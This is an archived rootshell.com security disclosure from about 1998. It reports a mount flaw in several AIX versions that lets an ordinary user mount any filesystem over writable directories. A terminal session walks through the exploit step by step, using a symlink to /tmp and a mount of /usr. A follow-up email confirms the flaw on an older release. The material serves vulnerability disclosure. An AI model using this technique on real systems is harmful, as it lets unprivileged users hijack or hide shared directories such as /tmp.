[ http://www.rootshell.com/ ]

----------------------------------------------------------------------------

My apologies if this is known already . . . however, I've seen nothing about
it and it does concern me.  I have verified a problem with mount on AIX 4.1.3,
4.1.4, 4.2.0, and 4.2.1 which allows a normal user to mount any filesystem
(including those already mounted by the system) on top of any writable
space.  Immediately, as the script below shows, this allows a user to
overwrite the contents of 777 directories with whatever files one wants.

(e.g. Removing access to temporary files in /tmp) . . .

sapphire /home/rquick > oslevel
4.1.4.0
sapphire /home/rquick > who am i
rquick    pts/2
sapphire /home/rquick > id
uid=20653(rquick) gid=101(comtec)
sapphire /home/rquick > ln -s /tmp mnt
sapphire /home/rquick > mount /usr mnt
sapphire /home/rquick > cd /tmp
sapphire /tmp > ls
OV           dict         include      lpd          sbin         ucb
adm          dt           lbin         lpp          share        usg
bin          ebt          lib          man          spool
ccs          eligibility  local        pub          sys
common       etc          lost+found   samples      tmp
sapphire /tmp > cd
sapphire /home/rquick > umount mnt
sapphire /home/rquick >

I have notified IBM of the problem . . . they have yet to respond.

S. Ryan Quick


----------------------------------------------------------------------------

Date: Fri, 20 Mar 1998 20:04:18 +0100 (MEZ)
From: Troeger Gerd <mai95dwy@gingema.rz.uni-leipzig.de>
To: info@rootshell.com
Subject: aix_mount


this one apparently also works on older aix-versions, verified on 3.2.5.0

regards
-g